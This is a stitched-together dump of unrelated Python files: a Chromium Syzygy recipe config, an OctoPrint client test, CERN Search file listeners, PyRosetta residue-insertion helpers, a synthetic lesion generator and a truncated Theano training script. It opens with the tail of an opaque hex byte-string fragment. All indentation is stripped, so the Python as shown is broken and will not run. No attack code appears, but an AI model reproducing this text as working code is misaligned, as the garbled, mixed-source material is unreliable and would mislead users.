1a\x85\xee\x3f\x1f\x4f\xf9\xc6\x1b\xe9\xd2\xc0\x67\xcc\x30\x78\xc5\x8c\xc9\xbf\xb4\x13\x3e\x28\xb4\x0a\xa8\x1c\x74\xc6\x01\xdb\x67\xa7\x1b\x38\x93\x2a\x8f\x79\xf7\x79\x26\xf4\xc5\x75\xed\x4f\xaa\x86\x9e\x7d\x83\xb6\x52\x11\xf1\xb9\x79\x46\x23\x8e\x02\x8b\xc0\xd0\x9d\x12\xab\xae\x88\xe4\xa3\x06\xb1\x89\x5d\x47\x3a\x21\x16\x46\xac\xc8\x1e\x68\x64\xcf\x1f\xd6\xfc\x32\x5a\x6f\x4c\xcb\x73\xce\x94\x48\x0c\x86\x1a\x42\xbc\xb0\xf1\xd8\xc0\x70\xf3\x4a\xec\x51\x3d\x38\x1e\xb0\xf6\x68\xc9\x31\xcb\xf0\x0e\x9d\xc2\x14\x3f\x0e\xa4\xc5\xfe\xec\xe8\xcc\x36\x3f\x3d\x59\x1f\xb3\x77\xf7\x5f\x5b\x12\x21\x12\x06\xcc\xb2\x12\x00\x02\xe7\xa4\xeb\xc8\x96\x0b\x85\xc9\xfa\xb1\x15\x2f\xdb\x85\x36\x16\xbb\xc5\x8b\xa5\x4e\x0f\xd0\xdd\x73\x16\x9d\x02\xba\x85\x4a\x5e\x27\x82\xff\x17\x85\xc6\x17\xf2\x1a\x03\xfd\xe7\x26\xe4\x0d\xad\xd2\x37\xab\x53\x3a\x75\x50\x8b\xa9\x31\xf2\xa3\x06\x4a\x77\x98\xce\xfb\x81\x19\xd9\xfe\x34\xd5\x89\xe1\xe2\x0f\x63\x67\x61\x06\x36\x26\xa3\xb3\x9e\xb2\xe7\xd2\xb9\x9d\x75\x5d\x0f\x5d\x37\xf4\xb2\x47\xb6\x9e\x11\xc7\xb9\xf0\x5b\x54\x8f\x46\x6a\xd6\xe9\x94\xbf\xdb\xcf\xc2\x5e\x4f\x2e\x58\x8f\x4c\xef\xcd\xd7\x9a\xd5\x68\xfa\xa4\xfe\x94\x74\x1d\x2e\xf5\x11\xad\xa2\x24\x4f\x95\xaf\xaa\x39\xeb\x2e\x54\xb0\xb8\xcf\x99\x54\xd1\xec\xf6\x47\x1f\x5b\x67\x1d\x43\x48\x6d\x92\x39\x72\x7b\xba\x06\x3e\xe2\x96\x5b\x96\x6e\x7e\xd2\x6f\xe4\x96\x28\x2a\xe5\x2d\x78\x00\x95\xa3\x2e\xcf\x27\xdd\xfb\x0e\xe8\xfb\x25\xc1\xd6\x06\x10\x8e\xc9\x9e\x8d\xeb\x86\x1e\xcd\x5c\x3c\xfa\x40\x17\xff\x9f\xf2\xbe\x62\xc9\xf7\xdc\xa9\x5f\xcb\x30\xe0\x06\xfe\xef\x29\xf5\x49\x59\xb3\xf8\x23\x9d\xec\xb5\x0a\x0f\x65\x91\x88\x29\xc2\x1b\x7c\x47\xd3\x8f\xd2\x9f\xe1\x57\x66\x86\x3a\x6d\xb9\x1f\xfc\x1e\x18\xc8\x1a\x0e\x06\xd2\xa7\xd4\x76\x1a\xae\x20\xb1\x56\xec\xb6\xc5\xa7\x86\xaf\x14\x4f\x6d\xac\x14\x7a\x84\x7b\xb3\x5a\x1f\x07\x4f\x5b\xa2\xaf\xdf\x0a\x91\x6b\x70\xaf\x22\xfc\x84\x77\xb2\x4c\xc2\xbf\x16\x47\xae\x8c\x99\x7b\x71\xef\x5e\x97\x5b\xa0\x5b\x69\xaf\x3b\x17\x82\x79\xd0\x8d\x53\xb9\xc7\x07\x1d\xcd\x21\x94\x99\x42\x0c\xc6\x4a\x23\x7e\xbe\x9d\x57\xba\xe2\x79\x54\x3f\xab\x1d\x4c\xcd\x60\xcf\x69\x97\x58\x54\x0b\xb8\x97\x91\x50\xc5\xf0\x92\x84\x08\x8d\xf4\xad\x14\x5c\x68\xa5\x3d\x35\x17\x36\x0f\x7e\x14\x6b\xdb\x9e\xca\xfe\x20\x82\x3a\xfd\xda\x19\xe4\x92\x29\xf8\xfb\xcd\x0b\xea\xda\x13\x7a\x1c\xfa\x4d\x36\xf9\xcf\xa2\x16\x70\x9b\xb8\xbb\x2f\xa6\xc2\x42\x9c\xf4\xb1\x10\x84\xb5\xcf\x2e\xd8\xbb\xcc\x95\x99\xce\x10\xee\x4b\x6b\x0e\xba\x6c\x06\xf5\x1e\xff\xa7\xae\x59\xbe\x5c\xa5\xcd\x8e\x65\x3f\x21\xb1\x1f\x94\xdb\x84\xe7\x58\x83\x8a\x67\x6d\x40\x78\x6b\x00\x37\x68\xa4\x19\x8a\x3f\x3b\x11\x7d\x5c\xb7\x9c\x0e\x4e\xcb\xb1\x3f\x95\x9a\xa7\x36\x98\x2c\xdd\x42\xc0\xb0\x5e\x1f\x20\x3f\x27\xfe\xd4\x9d\x11\x65\x3b\x27\x1a\x76\xae\xa4\x55\x5c\xc3\x8a\xb0\x58\x78\x35\x69\x11\xa3\x61\x76\x74\x55\xd3\x12\xee\x52\x62\xc9\x99\xef\x8c\x46\x14\x7a\x4c\x76\x9c\x7c\xa7\xa9\x16\x73\x64\x65\x25\x1b\x1c\x72\xec\x92\x21\x8a\x39\x13\x49\xe6\x45\xeb\xba\xc5\x39\x2b\x9e\x5e\x7b\x0a\x35\x6d\xdd\xc2\xd1\x29\x8f\x21\x40\x1e\x05\x7b\x59\x9d\xe8\xcd\x02\xc0\x4f\xc0\x36\x44\x17\xa1\xb3\x07\xfe\x50\x52\x5d\xc4\x39\x15\x32\xc7\x53\x26\x4c\xa3\xaa\x24\x02\x1e\x24\xc1\x10\x6c\x20\x51\xfa\xc9\xac\x66\x26\x04\x63\x7d\x95\x2b\x2d\xea\xcb\xd7\x81\x99\x20\x2d\xea\x85\xdd\xe5\xee\xc7\xca\xfa\x9a\x53\x67\x05\x6d\x1c\x76\x3d\x9a\x01\x0e\x76\x4f\x24\x5e\x2d\x30\xff\x31\x60\x76\x56\x7a\x05\x32\x74\x4d\x7e\x76\x22\x89\x6c\xa5\x85\x28\x67\x53\xa6\xa2\xae\xff\x47\x5b\xa3\x5c\x19\x0a\x36\xa9\x86\x92\xe7\xd1\x0f\xc1\xa7\xe8\x71\xb3\xbf\xc0\x75\x2a\xc1\x12\xae\x3a\x2c\x36\xf6\x90\x89\x62\xf8\x9f\x4a\x45\x84\x77\x1b\x71\x59\x76\xa1\xde\x5e\x82\xaa\xfc\x31\x45\xce\x69\x87\x7f\xfa\xc6\x51\x34\x9a\xda\xeb\x73\xc8\xbf\x5c\x8a\x22\xfd\x06\xc0\xd9\xff\xe4\xa0\x45\x43\x62\x12\x36\xc0\x3a\xa7\x96\xd3\x25\xf3\x33\xc8\x0f\xb6\xfc\x96\x8a\x35\xdb\x65\xf3\x8c\xc3\x5d\xee\xee\xaa\x27\x60\x85\x86\xc4\x9b\x03\xde\x9b\x13\x87\x51\x8c\x01\x47\xde\xc9\x10\x80\x77\x53\x89\xe6\x5d\xf5\xe1\xc9\x71\xf4\x89\x23\x18\xe3\x81\xc8\x93\x41\xe7\xec\x2f\x45\x28\x73\x33\x00\xc2\x89\xbe\xaf\xa4\xd1\x9c\x8e\x29\xc1\x15\x1b\x31\x2a\x6f\xcf\x5c\x6c\xe0\xc7\xa1\x86\xd8\xad\xfb\x38\x87\xce\x66\xff\x26\x31\x76\x40\x57\x5e\x7e\x6b\x6d\x93\x6e\xd5\x9b\x91\xdd\x1e\x2b\xdd\x61\xb7\x59\xe9\x6e\xa7\xb8\x78\xd2\x87\x02\x3a\xfd\x69\x93\x00\xc6\x08\xc9\x27\x0a\x3c\x75\x17\x81\x46\xa9\xe3\x7b\x39\xa1\x62\x15\xfb\x5c\xa9\xb4\x96\x29\x2d\x68\xab\x1e\xd4\xfc\x8a\x38\x27\xf2\xd0\xe4\x1a\xf3\x15\xae\x64\xe0\xb0\xd8\x4b\x7f\x67\xed\x75\x3c\x61\xc0\x8f\x04\xc1\x9f\x61\xb6\x7f\x9f\x35\xb1\xf5\xb9\x5c\xa3\x30\xc8\xd2\x24\x67\x00\x06\x17\xea\xfa\xaf\x48\x13\x72\x40\x94\x95\x49\x97\xa1\xd3\x62\x8c\x84\xce\x52\xe1\x86\xb3\x31\x97\x2d\xcb\xc5\x38\xda\x8e\xb6\xce\x38\x7a\x0f\x7f\x6d\x28\xac\x69\x5b\x61\xaf\xf8\x2c\x3c\x9d\x5c\x79\xf1\xe9\xcf\x05\xab\xa3\x87\xc7\xc5\x15\xaa\x6f\x6d\x30\x6f\x89\xa6\x90\xad\xeb\x3b\xca\xda\x85\xc8\x00\x70\x7a\x6d\x6e\x81\x56\x15\x11\x53\x76\x43\x41\x14\x98\x73\x6b\x80\x5e\xeb\x12\x8c\xcc\xcd\xcb\xfe\x7c\x1a\x41\x60\xb7\xd6\xee\x76\x53\x8a\x62\x90\x74\xdb\x64\x89\xb1\xc2\x20\x60\xe9\x8f\x29\x4e\x27\x6a\x0d\x97\x7a\x0b\x39\x37\xb1\x18\xd8\x5e\x25\xc6\x7a\x01\xd9\xb1\xcc\x38\xb9\x84\xa2\xe3\x52\x3e\xc4\x6a\xe1\xb4\x81\x26\x6e\xd3\x67\xf6\x6d\xad\xba\x9f\x56\x12\x98\x9f\x7b\xe2\x60\x82\xf8\x33\xcc\xef\xd7\x5c\x31\xe9\x1c\x9a\x8b\xa3\x7a\xec\x11\x20\xf8\x7d\xe9\x8d\x20\x30\x59\xeb\x17\xc5\x8c\x09\x7b\x2c\x12\xdf\x42\xb3\xd2\x0f\xfe\x6f\x0c\x29\xf5\xda\x1f\xe2\x5e\xc8\x10\x44\x97\x15\xa3\x0f\x3b\xdf\x5e\xdb\xcb\xf0\x46\x37\x2c\xb7\x92\x0a\x8f\x79\x5c\x92\x9f\xaf\x53\x4b\x8b\xaa\xf4\xc4\xb7\x96\x9a\x4f\x49\x1f\xda\x76\xdb\xdd\xfa\x31\x2a\x98\xe6\x54\xca\x22\x11\xb7\xce\x4b\x1e\xf4\x4c\xd6\x84\xa3\xfc\xc3\xe2\xec\x00\x92\x47\x41\xf0\x26\x55\xf3\x29\x24\x06\xf7\xd2\x84\xf2\xde\x16\x23\xf8\x5b\x47\xac\x1d\x91\xec\x32\x38\xa1\x75\x44\xd2\xf0\xfb\xb5\x19\xd4\x21\xdd\x38\x5a\x1c\x9c\x43\x9b\x7d\x27\x42\xfa\x17\x07\xa9\xaf\xfa\x6a\xc6\x91\xb9\xf7\xfc\x40\xdf\x82\x27\xd6\xa1\x2d\xb0\x12\x7a\xc9\x80\x14\x47\xd4\x31\x3d\xbb\xaa\x75\x70\x34\x2f\x63\x16\x46\xb1\xa7\x3d\x86\xa1\xe6\xad\x1b\x0a\xb3\xe9\x24\x2f\xaa\x0b\x31\xcc\x87\x76\x52\x64\xa9\xb5\x24\x69', 2) | python |
# Copyright 2014 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import types
from recipe_engine.config import (
config_item_context, ConfigGroup, Single, Static)
from recipe_engine.config_types import Path
from . import api as syzygy_api
def BaseConfig(CHECKOUT_PATH, **dummy_kwargs):
return ConfigGroup(
CHECKOUT_PATH = Static(CHECKOUT_PATH),
official_build = Single(bool, empty_val=False, required=False),
unittests_gypi = Single(Path, required=False),
version_file = Single(Path, required=False),
)
config_ctx = config_item_context(BaseConfig)
@config_ctx(is_root=True)
def BASE(dummy_c):
pass
@config_ctx()
def syzygy(c):
c.official_build = False
c.unittests_gypi = c.CHECKOUT_PATH.join('syzygy', 'unittests.gypi')
c.version_file = c.CHECKOUT_PATH.join('syzygy', 'SYZYGY_VERSION')
@config_ctx(includes=['syzygy'])
def syzygy_x64(dummy_c):
pass
@config_ctx()
def syzygy_official(c):
c.official_build = True
c.unittests_gypi = c.CHECKOUT_PATH.join('syzygy', 'unittests.gypi')
c.version_file = c.CHECKOUT_PATH.join('syzygy', 'SYZYGY_VERSION')
@config_ctx()
def kasko_official(c):
c.official_build = True
c.unittests_gypi = c.CHECKOUT_PATH.join('syzygy', 'kasko', 'unittests.gypi')
c.version_file = c.CHECKOUT_PATH.join('syzygy', 'kasko', 'VERSION')
| python |
"""Test entry point"""
import aiohttp
import pyoctoprintapi
import argparse
import asyncio
import logging
from types import MappingProxyType
LOGGER = logging.getLogger(__name__)
async def main(host, user, port, use_ssl):
"""Main function."""
LOGGER.info("Starting octoprint")
async with aiohttp.ClientSession(cookie_jar=aiohttp.CookieJar(unsafe=True)) as websession:
websession._default_headers = MappingProxyType({}) # type: ignore
client = pyoctoprintapi.OctoprintClient(host, websession, port, use_ssl, "/")
api_key = await client.request_app_key("testapp", user, 60)
client.set_api_key(api_key)
printer_info = await client.get_printer_info()
job_info = await client.get_job_info()
server_info = await client.get_server_info()
tracking_info = await client.get_tracking_info()
discovery_info = await client.get_discovery_info()
camera_info = await client.get_webcam_info()
await websession.close()
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument("host", type=str)
parser.add_argument("user", type=str)
parser.add_argument("-p", "--port", type=int, default=80)
parser.add_argument("-s", "--ssl", type=bool, default=False)
parser.add_argument("-d", "--debug", type=bool, default=False)
args = parser.parse_args()
LOG_LEVEL = logging.INFO
if args.debug:
LOG_LEVEL = logging.DEBUG
logging.basicConfig(format="%(message)s", level=LOG_LEVEL)
try:
asyncio.run(
main(args.host, args.user, args.port, args.ssl)
)
except KeyboardInterrupt:
pass | python |
#!/usr/bin/python
# -*- coding: utf-8 -*-
#
# This file is part of CERN Search.
# Copyright (C) 2018-2021 CERN.
#
# Citadel Search is free software; you can redistribute it and/or modify it
# under the terms of the MIT License; see LICENSE file for more details.
"""Signal Receivers."""
from flask import current_app
from invenio_files_rest.models import ObjectVersion
from cern_search_rest_api.modules.cernsearch.api import CernSearchRecord
from cern_search_rest_api.modules.cernsearch.files import (
delete_all_record_files,
delete_file_instance,
delete_previous_record_file_if_exists,
delete_record_file,
persist_file_content,
record_from_object_version,
)
from cern_search_rest_api.modules.cernsearch.indexer import CernSearchRecordIndexer
from cern_search_rest_api.modules.cernsearch.tasks import process_file_async
def file_uploaded_listener(obj: ObjectVersion = None):
"""Process file function calls file processor async."""
current_app.logger.debug("File uploaded listener: %s", str(obj))
delete_previous_record_file_if_exists(obj)
process_file_async.delay(str(obj.bucket_id), obj.key)
def file_processed_listener(app, processor_id, file: ObjectVersion, data):
"""Finish file processing.
1. Persist extracted content
2. Index extracted content
3. Delete record file.
"""
current_app.logger.debug("File processed listener: %s with processor %s", str(file), processor_id)
file_content = __extract_content(data)
if current_app.debug:
for key in file_content:
if key == "content":
current_app.logger.debug("File processed listener: has content %s ", bool(file_content[key]))
else:
current_app.logger.debug("File processed listener: %s - %s ", key, file_content[key])
record = record_from_object_version(file)
persist_file_content(record, file_content, file.basename)
CernSearchRecordIndexer().index(record)
# delete real file from filesystem only after indexing successfully
delete_file_instance(file)
def file_deleted_listener(obj: ObjectVersion = None):
"""File deleted through api calls: cleanup files and reindex."""
current_app.logger.debug("File deleted listener: %s", str(obj))
record = record_from_object_version(obj)
delete_record_file(record, obj)
CernSearchRecordIndexer().index(record)
def record_deleted_listener(sender, record: CernSearchRecord, *args, **kwargs):
"""Record deleted through api calls: cleanup files."""
current_app.logger.debug("File deleted listener: %s", str(record))
delete_all_record_files(record)
def __extract_content(data: dict):
return data
| python |
from pyrosetta import *
from roseasy.movers import constraint
def insert_alas(pose, position, length, insert_after=True, reset_fold_tree=True, fold_tree_root=1):
'''Insert a poly-ALA peptide before or after a given position.,
Set the fold tree to have a cutpoint before or after inserted residues.
Author: XingJie Pan
'''
assert(1 <= position <= pose.size())
# Set the fold tree with a single cutpoint
def sub_fold_tree_add_edges_no_jump(ft, root, start, stop):
'''Add edges to a sub-fold-tree that does not have
and jumps.'''
if start < root:
ft.add_edge(root, start, -1)
if stop > root:
ft.add_edge(root, stop, -1)
if reset_fold_tree:
cutpoint = position if insert_after else position - 1
ft = rosetta.core.kinematics.FoldTree()
if fold_tree_root <= cutpoint and cutpoint < pose.size():
sub_root = pose.size()
ft.add_edge(fold_tree_root, sub_root, 1)
sub_fold_tree_add_edges_no_jump(ft, sub_root, cutpoint + 1, pose.size())
sub_fold_tree_add_edges_no_jump(ft, fold_tree_root, 1, cutpoint)
elif fold_tree_root > cutpoint and cutpoint > 0:
sub_root = 1
ft.add_edge(fold_tree_root, sub_root, 1)
sub_fold_tree_add_edges_no_jump(ft, sub_root, 1, cutpoint)
sub_fold_tree_add_edges_no_jump(ft, fold_tree_root, cutpoint + 1, pose.size())
else:
sub_fold_tree_add_edges_no_jump(ft, fold_tree_root, 1, pose.size())
pose.fold_tree(ft)
# Append the residues
residue_type_set = pose.residue_type_set_for_pose()
new_rsd = rosetta.core.conformation.ResidueFactory.create_residue( residue_type_set.name_map("ALA") )
for i in range(length):
if insert_after:
pose.conformation().safely_append_polymer_residue_after_seqpos(new_rsd, position + i, True)
pose.set_omega(position + i, 180)
else:
pose.conformation().safely_prepend_polymer_residue_before_seqpos(new_rsd, position, True)
pose.set_omega(position, 180)
if insert_after:
rosetta.core.conformation.idealize_position(position + length, pose.conformation())
if position + length + 1 <= pose.size():
rosetta.core.conformation.idealize_position(position + length + 1, pose.conformation())
else:
if position - 1 > 0:
rosetta.core.conformation.idealize_position(position - 1, pose.conformation())
rosetta.core.conformation.idealize_position(position, pose.conformation())
def mutate_residues(pose, res_list, aa_list, protein_only=True):
'''Mutate a list of residues. The list of AAs could
either be 1 letter code or 3 letter code.
Author: XingJie Pan
'''
aa_name_map = {'A':'ALA', 'P':'PRO', 'V':'VAL', 'L':'LEU', 'I':'ILE', 'M':'MET',
'F':'PHE', 'Y':'TYR', 'W':'TRP', 'S':'SER', 'T':'THR', 'C':'CYS',
'K':'LYS', 'R':'ARG', 'H':'HIS', 'D':'ASP', 'E':'GLU', 'N':'ASN',
'Q':'GLN', 'G':'GLY'}
mutater = rosetta.protocols.simple_moves.MutateResidue()
for i in range(len(res_list)):
if protein_only and (not pose.residue(res_list[i]).is_protein()):
continue
name = aa_list[i] if len(aa_list[i]) == 3 else aa_name_map[aa_list[i]]
mutater.set_res_name(name)
mutater.set_target(res_list[i])
mutater.apply(pose)
def add_aas(pose, position, sequence, pdbnum=False, chain='A'):
if pdbnum:
position = pose.pdb_info().pdb2pose(chain, position)
insert_alas(pose, position, len(sequence))
close_helix_by_minimization(pose, position, position +
len(sequence) + 2, position + 1, position + len(sequence) +
1)
mutate_residues(pose, list(range(position + 1, position + 1 +
len(sequence))), list(sequence), True)
def close_helix_by_minimization(pose, movable_region_start, movable_region_end, helix_start, helix_end):
'''Close a gap inside a helix by minimization.
Return true if the gap could be closed.
'''
# Make a clone of poly ALA pose for minimization
#simple_pose_moves.mutate_pose_to_single_AA(pose, 'ALA')
rosetta.core.pose.correctly_add_cutpoint_variants(pose)
# Set hydrogen bond constraints for the linkers and helix
linker_residues = list(range(movable_region_start, helix_start + 1)) + list(range(helix_end, movable_region_end + 1))
linker_hbonds = find_bb_hbonds_involving_residues(pose, linker_residues)
pose.constraint_set().clear()
helix_hbs = [(i + 4, i) for i in range(helix_start, helix_end - 3)]
constraint.add_constraints_to_pose(pose, constraint.get_bb_hbond_constraint(linker_hbonds + helix_hbs))
# Set score function
sfxn = rosetta.core.scoring.get_score_function()
sfxn.set_weight(rosetta.core.scoring.base_pair_constraint, 1) #H-bond constraint
# Set movemap
mm = rosetta.core.kinematics.MoveMap()
for i in range(movable_region_start, movable_region_end + 1):
mm.set_bb(i, True)
# Set the minimization mover
min_opts = rosetta.core.optimization.MinimizerOptions( "lbfgs_armijo_nonmonotone", 0.01, True )
min_mover = rosetta.protocols.minimization_packing.MinMover()
min_mover.movemap(mm)
min_mover.min_options(min_opts)
# Close the chain
for chainbreak_weight in [0.5, 1, 5, 10]:
sfxn.set_weight(rosetta.core.scoring.chainbreak, chainbreak_weight)
min_mover.score_function(sfxn)
min_mover.apply(pose)
chainbreak_energy = pose.energies().total_energies()[rosetta.core.scoring.chainbreak]
if chainbreak_energy > 0.2:
return False
# Minimize without constraints
sfxn.set_weight(rosetta.core.scoring.base_pair_constraint, 0)
min_mover.score_function(sfxn)
min_mover.apply(pose)
return True
def find_bb_hbonds_involving_residues(pose, residues):
'''Find backbone hbonds involving a given set of residues.
An Hbond is defined as (donor_res, acceptor_res).
Ignore the terminal residues.
'''
hbset = rosetta.core.scoring.hbonds.HBondSet(pose, bb_only=True)
hbonds = []
for i in range(1, hbset.nhbonds() + 1):
acc = hbset.hbond(i).acc_res()
don = hbset.hbond(i).don_res()
# Ignore terminal residues
if acc in [1, pose.size()] or don in [1, pose.size()]:
continue
if acc in residues or don in residues:
hbonds.append((don, acc))
return hbonds
| python |
#!/usr/bin/env python3
a, b, c, d = map(int, open(0).read().split())
print(abs(a-c) + abs(b-d) + 1) | python |
"""
Generate matched synthetic lesions dataset
Authors: Chris Foulon & Michel Thiebaut de Scotten
"""
import os
import argparse
import random
import numpy as np
import json
import csv
import nibabel as nib
import nilearn
from nilearn.masking import compute_multi_background_mask, intersect_masks
from nilearn.image import threshold_img
from sklearn.cluster import KMeans
# input: /data/Chris/lesionsFormated
def create_coverage_mask(image_path_list):
nii_list = []
for f in image_path_list:
if not os.path.isfile(f):
raise ValueError('{} is not an existing file'.format(f))
if not nii_list:
nii_list = [nib.load(f)]
else:
nii_list.append(nib.load(f))
return compute_multi_background_mask(nii_list, threshold=0, connected=False, n_jobs=-1)
def create_lesion_set(coverage_mask, roi_size, output_path=None):
mask_coord = np.where(coverage_mask.get_fdata())
mask_coord = [(mask_coord[0][i], mask_coord[1][i], mask_coord[2][i]) for i, _ in enumerate(mask_coord[0])]
k = int(np.floor(len(mask_coord) / roi_size))
if k == 0:
return None
print('Running KMeans with k = {}'.format(k))
kmeans = KMeans(k).fit(mask_coord)
kmeans_labels_img = kmeans.labels_
new_data = np.zeros(coverage_mask.shape, int)
for ind, c in enumerate(mask_coord):
# KMeans labels start at 0, to avoid the first cluster to be in the 0 background of the image we add 1
new_data[c] = kmeans_labels_img[ind] + 1
new_nii = nib.Nifti1Image(new_data, coverage_mask.affine)
if output_path is not None and output_path != '':
nib.save(new_nii, output_path)
return new_nii
def split_labels(labels_img, output_folder=None):
if not isinstance(labels_img, nib.Nifti1Image):
raise TypeError('labels_img must be an instance of nibabel.Nifti1Image')
data = labels_img.get_fdata()
affine = labels_img.affine
o_max = np.amax(data)
label_img_list = []
if output_folder is not None:
if not os.path.exists(output_folder):
os.mkdir(output_folder)
for i in np.arange(1, o_max + 1):
label = np.array(np.where(data == i))
mask = np.zeros(data.shape)
mask[label[0, ], label[1, ], label[2, ]] = i
nii_label = nib.Nifti1Image(mask, affine)
label_img_list.append(nii_label)
if output_folder is not None:
path = os.path.join(output_folder, 'label_{}.nii.gz'.format(str(i)))
nib.save(nii_label, path)
return label_img_list
def print_imgs_avg_size(list_img):
sizes = []
for img in list_img:
sizes.append(len(np.where(img.get_fdata())[0]))
print('Mean size of the images: {}'.format(np.mean(sizes)))
def main():
parser = argparse.ArgumentParser(description='Generate matched synthetic lesions dataset')
paths_group = parser.add_mutually_exclusive_group(required=True)
paths_group.add_argument('-p', '--input_path', type=str, help='Root folder of the lesion dataset')
paths_group.add_argument('-li-', '--input_list', type=str, help='Text file containing the list of lesion files')
paths_group.add_argument('-m', '--mask', type=str, help='region where the synthetic lesions will be generated')
parser.add_argument('-o', '--output', type=str, help='output folder')
parser.add_argument('-fwhm', '--smoothing_param', type=int, default='12',
help='fwhm parameter to nilearn smooth_img function')
parser.add_argument('-thr', '--smoothing_threshold', type=float, default=0.5,
help='Threshold applied on the smoothing')
# parser.add_argument('-v', '--verbose', default='info', choices=['none', 'info', 'debug'], nargs='?', const='info',
# type=str, help='print info or debugging messages [default is "info"] ')
args = parser.parse_args()
args.output = os.path.abspath(args.output)
if args.mask is not None:
args.mask = os.path.abspath(args.mask)
if not os.path.exists(args.mask):
raise ValueError('The mask {} does not exist'.format(args.mask))
coverage_mask = nib.load(args.mask)
else:
if args.input_path is not None:
les_list = [os.path.join(args.input_path, f) for f in os.listdir(args.input_path)]
else:
if not os.path.exists(args.input_list):
raise ValueError(args.input_list + ' does not exist.')
if args.input_list.endswith('.csv'):
with open(args.input_list, 'r') as csv_file:
les_list = []
for row in csv.reader(csv_file):
if len(row) > 1:
les_list += [r for r in row]
else:
les_list.append(row[0])
else:
# default delimiter is ' ', it might need to be changed
les_list = np.loadtxt(args.input_list, dtype=str, delimiter=' ')
les_list = [os.path.abspath(f) for f in les_list]
coverage_mask = create_coverage_mask(les_list)
nib.save(coverage_mask, os.path.join(args.output, 'coverage_mask.nii.gz'))
thr = args.smoothing_threshold
# match +-10% size random in the pool
# iterate on sizes from the list in master.sh
roi_size_list = ['300000', '200000', '120000', '110000', '100000', '90000', '80000', '70000', '60000', '50000',
'40000', '30000', '20000', '10000', '9000', '8000', '7000', '6000', '5000', '4000', '3000', '2000',
'1000', '900', '800', '700', '600', '500', '400', '300', '200', '100', '35000', '25000', '15000']
# just for testing
# roi_size_list = ['3000', '4000', '5000']
# roi_size_list = [6998, 4275, 2300, 11945, 96, 5322, 5604, 8229, 6334, 3765, 8225, 449, 10305, 1755, 753, 2378,
# 2834, 4726, 24041,10119, 8366, 24358, 5175, 8380, 2592, 3298, 3946, 11453, 7328, 3073, 5104,
# 1065, 2532, 4849, 5930, 27200, 304]
synth_lesion_size_dict = {}
for s in roi_size_list:
print('Running the KMeans with ROIsize = {}'.format(s))
labels_img = create_lesion_set(coverage_mask, int(s), os.path.join(args.output, 'labels_{}.nii.gz'.format(s)))
if labels_img is None:
print('cluster size too big compared to the mask')
continue
label_img_list = split_labels(labels_img)
smoothed_label_list = [nilearn.image.smooth_img(label_img, args.smoothing_param)
for label_img in label_img_list]
smoothed_thr_label_list = [threshold_img(nii, thr) for nii in smoothed_label_list]
smoothed_thr_binarized_label_list = [nilearn.image.math_img('img > {}'.format(thr), img=img)
for img in smoothed_thr_label_list]
smoothed_thr_binarized_masked_label_list = [intersect_masks([nii, coverage_mask], 1, True)
for nii in smoothed_thr_binarized_label_list]
print_imgs_avg_size(smoothed_thr_binarized_masked_label_list)
for lesion in smoothed_thr_binarized_masked_label_list:
lesion_size = len(np.where(lesion.get_fdata())[0])
if lesion_size not in synth_lesion_size_dict:
file_name = 'synth_les_{}.nii.gz'.format(lesion_size)
file_path = os.path.join(args.output, file_name)
synth_lesion_size_dict[lesion_size] = [file_path]
else:
file_name = 'synth_les_{}_{}.nii.gz'.format(lesion_size, len(synth_lesion_size_dict[lesion_size]))
file_path = os.path.join(args.output, file_name)
synth_lesion_size_dict[lesion_size].append(file_path)
nib.save(lesion, file_path)
with open(os.path.join(args.output, '__lesion_dict.json'), 'w+') as out_file:
json.dump(synth_lesion_size_dict, out_file, indent=4)
if __name__ == '__main__':
main()
| python |
# -*- coding: utf-8 -*-
# !/usr/bin/python
"""
Created on Mar 18th 10:58:37 2016
train a continuous-time sequential model
@author: hongyuan
"""
import pickle
import time
import numpy
import theano
from theano import sandbox
import theano.tensor as tensor
import os
import sys
#import scipy.io
from collections import defaultdict
from theano.tensor.shared_randomstreams import RandomStreams
import modules.utils as utils
import modules.models as models
import modules.optimizers as optimizers
import modules.controllers as controllers
import modules.data_processers as data_processers
import run_models
import datetime
dtype=theano.config.floatX
#
import argparse
__author__ = 'Hongyuan Mei'
def main():
parser = argparse.ArgumentParser(
description='Trainning model ... '
)
#
parser.add_argument(
'-m', '--Model', required=True,
choices = ['hawkes', 'hawkesinhib', 'conttime'],
help='Which model to train? hawkes (SE-MPP)? hawkesinhib (D-SM-MPP)? conttime (N-SM-MPP)?'
)
parser.add_argument(
'-fd', '--FileData', required=True,
help='Path of the dataset (e.g. ./data/data_hawkes/)'
)
#
parser.add_argument(
'-tr', '--TrainRatio', #required=False,
default = 1.0, type = float,
help='How much data to train?'
)
#
parser.add_argument(
'-cl2', '--CoefL2', #required=False,
default = 0.0, type = float,
help='Coefficient of L2 norm'
)
#
parser.add_argument(
'-d', '--DimLSTM', #required=False,
default = 64, type = int,
help='Dimension of LSTM model '
)
parser.add_argument(
'-s', '--Seed', #required=False,
default = 12345, type = int,
help='Seed of random state'
)
#
parser.add_argument(
'-fp', '--FilePretrain', required=False,
help='File of pretrained model (e.g. ./tracks/track_PID=XX_TIME=YY/model.pkl)'
)
parser.add_argument(
'-tp', '--TrackPeriod', #required=False,
default = 1000, type = int,
help='Track period of training'
)
parser.add_argument(
'-me', '--MaxEpoch', #required=False,
default = 50, type = int,
help='Max epoch number of training'
)
parser.add_argument(
'-sb', '--SizeBatch', #required=False,
default = 10, type = int,
help='Size of mini-batch'
)
parser.add_argument(
'-op', '--Optimizer', #required=False,
default = 'adam', type = str,
choices = ['adam', 'sgd'],
help='Optimizer of training'
)
parser.add_argument(
'-mt', '--MultipleTrain', #required=False,
default = 1, type = int,
help='Multiple of events to sample (integral) for training'
)
parser.add_argument(
'-md', '--MultipleDev', #required=False,
default = 10, type = int,
help='Multiple of events to sample (integral) for dev'
)
parser.add_argument(
'-wt', '--WhatTrack', #required=False,
default = 'loss', type = str,
choices = ['loss', 'rmse', 'rate'],
help='What to track for early stoping ? '
)
parser.add_argument(
'-ls', '--LossType', #required=False,
default = 'loglikehood', type = str,
choices = ['loglikehood', 'prediction'],
help='What is the loss to optimized ?'
)
parser.add_argument(
'-lr', '--LearnRate', #required=False,
default = 1e-3, type = float,
help='What learning rate to use ?'
)
parser.add_argument(
'-pp', '--PartialPredict', #required=False,
default = 0, type = int,
choices = [0, 1],
help='What to only predict part of stream ? 0--False, 1--True'
)
parser.add_argument(
'-ps', '--PruneStream', #required=False,
default = 0, type = int,
